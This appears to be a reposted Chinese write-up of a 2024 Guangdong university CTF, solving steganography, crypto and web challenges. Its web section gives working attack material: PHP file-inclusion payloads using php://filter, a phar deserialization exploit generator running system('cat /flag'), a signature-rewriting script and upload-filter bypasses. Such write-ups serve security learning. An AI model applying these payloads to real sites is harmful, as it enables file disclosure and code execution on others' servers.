首页 > 其他分享 >2024广东大学生攻防大赛WP

2024广东大学生攻防大赛WP

时间:2024-05-13 11:19:34浏览次数:29  
标签:__ 攻防 key phar 2024 flag file WP php

Misc

猜一猜

题目描述:

你们想要的flag就在压缩包里面。

压缩包文件名 解密

image-20240512134938417

解压密码为a1478520

然后修改flag.png文件头

image-20240512135012100

得到

flag

扫描二维码之后

❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

花朵解密

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo

image-20240512135124135

得到flag

flag{rUsJyNdKhdKuS4VfO7}

要的就在这

题目描述:

你要的在这里

misc

用010editor打开

image-20240512211529760

上面那个是定积分,解出来是π

然后6是什么呢,猜测是3.1415

然后用stegpy解密

>python steg.py misc.png -p
Enter password (will not be echoed):
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
这一串十六进制转字符
5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=

k:luckyone

image-20240512213240860

flag{believe_you_are_lucky}

Web

消失的flag

题目描述:

flag就隐藏再某个文件里面,看看能不能包含出来 。

访问

image-20240512142516919

猜测是XFF,添加:x-forwarded-for:127.0.0.1

image-20240512142627590

File is NUll

文件包含漏洞

?file=/flag

image-20240512142713472

用另一种方法

?file=php://filter/read=convert.base64-encode/resource=/flag

也不行

最后试出

?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag

df4083ae2869462cad0d002533f6cbf7

unserialize_web

同事给我了一个反序列话的源码,在线求助 !

看这篇文章有了灵感

https://blog.csdn.net/qq_53460654/article/details/121889104

https://pankas.top/2022/08/04/php(phar)反序列化漏洞及各种绕过姿势/#phar反序列化

首先扫一下目录发现/www.tar.gz

生成.phar

<?php
class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }

    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }

    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }

    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "文件存在";
    }
}
$f = new File();
$f->val1 = "file";
$f->val2 = "exists";
$f->val3 = "system('cat /flag');";

$p = new Phar("File.phar", 0);
$p->startBuffering();
$p->setMetadata($f);
$p->setStub("GIF89a" . "<?php __HALT_COMPILER();" . "?>");
$p->addFromString("test.txt", "test");
$p->stopBuffering();
?>

image-20240512154607701

为了绕过__wakeup()方法,3要改为4

image-20240512154615229

修改签名

# -*- coding: utf-8 -*-
from hashlib import sha1
f = open('./File.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('Filenew.phar', 'wb').write(newf) # 写入新文件

分析upload.php可以看到

image-20240512194446969

源码ban掉了 __HALT_COMPILER(); 标识,没有这个是不认phar的,这个可以使用gzip压缩进行绕过

然后修改后缀.gif,文件上传

最后用phar 协议触发

phar://./upload/Filenew.phar.gif

image-20240512161230196

5740619516574ce288f8f30d3f010e70

但我提交的是:f5cc52e28f364ad69c093a9a6dd1c954

flag是动态的

hackme

弱口令为admin:123456

然后显示

remote ip address is block!

抓包得到

Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw

image-20240512213638866

改成none不行

扫目录得到/vendor

image-20240512213727326

分析里面的文件

可以看到https://github.com/firebase/php-jwt

然后没思路了

mypdf

image-20240512213843511

下载源码

Crypto

encipher

题目描述:

小明在学习加解密时,对输入的重要信息做了加密,但他又只是个菜鸡,对加密后的数据不会解密,很需要大哥哥们的帮助 如下时小明加密后的信息:

from Crypto.Util.number import getPrime, bytes_to_long
from Crypto.Util.strxor import strxor
from Crypto.PublicKey import RSA

def decrypt(c, N, d):
    m = pow(c, d, N) #rsa_decrypt
    origin = 24#in(xor_key)
    xor_key = m.to_bytes(origin, byteorder='big')
    key = b'Life is like an ocean on'
    msg = strxor(xor_key, key)
    msg = msg.decode()
    return msg
    #message = decrypt(ciphertext, N, d)
    #print(message)

d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
c = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451

mm=decrypt(c,N,d)
print(mm)

# flag{1s_Pa33w0rd_1y2u22}

flag{1s_Pa33w0rd_1y2u22}

End

image-20240512213931326

标签:__,攻防,key,phar,2024,flag,file,WP,php
From: https://www.cnblogs.com/hihopkc/p/18188791

相关文章

  • 2022广东大学生攻防大赛WP
    MISC复合尝试导出http数据发现文件类型和文件名都被改过把pass.md改为pass.zip,发现打不开添加文件头解压得到Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyv......
  • 力扣1553 2024.5.13
    原题网址:此处为链接个人难度评价:1700分析:虽然不知道为什么贪心不对,但总之贪心不对。数据如此大也难以DP,那么只有搜索了。显然有一眼可得的搜索记忆化:记忆当只剩下k个果时还需要几天。值得一提的是,本代码实际上可能并不是一个正解代码,其可能无法在整数域上保证所有答案正确,但在......
  • P10217 [省选联考 2024] 季风
    [原题链接](https://www.luogu.com.cn/problem/P10217) 发现一定是若干个整段数组和一个前缀,可以枚举长度模$n$的余数,即位前缀。记当前位置为$i$,当前$x$数组前缀和为$sum1$,$y$数组为$sum2$,$x$数组总和为$sumx$,$y$数组总和为$sumy$。整段数组的个数为$m$,答案即......
  • 2024 黑龙江省赛 游记
    达成成就:0dirt&&队史第一次一血&&(可能是生涯唯一一次)打进rk3之内。继续和月间天路的老队友们组了个队,队伍名是上学期打完南京站的时候(由于暴雪航班取消)坐绿皮火车回去的时候看见遍地积雪的时候酝酿的名字,后来和队友们商讨选出来的“雪原漫舞”。Day0前一天的热身赛我......
  • 2024THUSC游记
    Day-?一直停摆,临近比赛才恢复训练,赛前只训了两天Day0感觉有点头痛啊,害怕去不了但还是去了,颓废了一路跟宋金哲一个房晚上去了附近的一个商城,偶遇麦秋飞,吃了面晚上11点睡Day1早上报道,但因为下雨延迟了一个小时去试机,键盘好用,交互调不出来,最后发现数据错了。。。还有提......
  • 2024苏锡常镇高三二模19
    \(实际上不那么难\)......
  • 2024 年 5 月 12 日 母亲节 周日 晴 常(197 字)
    正文昨天玩到了凌晨3点,今天睡了一天……断断续续睡到12点起床,下午又从5点睡到了7点。我愿称之为睡神…….其它时间就是做工作日一直没时间做的杂事,比如洗衣服,刷鞋,换洗被套什么的,还挺花时间。用了得有两三个小时。所以昨天说的今天开摆,那是真的开摆了(笑......
  • thusc2024 题目
    day1t1题目描述求\(\left(\sum\limits_{i_1=0}^{n_1-1}\sum\limits_{i_2=0}^{n_2-1}\cdots\sum\limits_{i_d=0}^{n_k-1}\max\left(0,(i_1\operatorname{xor}i_2\operatorname{xor}\cdots\operatorname{xor}i_d)-l\right)\right)\bmodp\)。输入格式输入包含多......
  • 2024年,Rust和Go学习哪个更有优势
    在编程语言的世界里,技术的更新迭代速度一直都是非常快的。而在2024年这个特殊的年份,Rust和Go这两门编程语言备受关注,成为了许多程序员学习的焦点。那么,在这两者之间,到底该选择学习哪个,才能更具优势呢?本文将从各个方面分析比较Rust和Go,帮助读者更好地做出决策。1.语言特性比较Ru......
  • 2024PKUSC游记
    考完一模尽然有4天的停课时间,又爽又不爽。住在一起的是两位不用考一模的初三巨佬,一位搞物理,以为搞信奥,隔壁寝室还有初三进过两次福建队的,非常离谱。四天做了好多省选题,感觉真的好难写。再把技巧放一下:1.在构造题中看到相等,我们就能想到各种-1和1相抵消。2.二进制想到拆位3.数......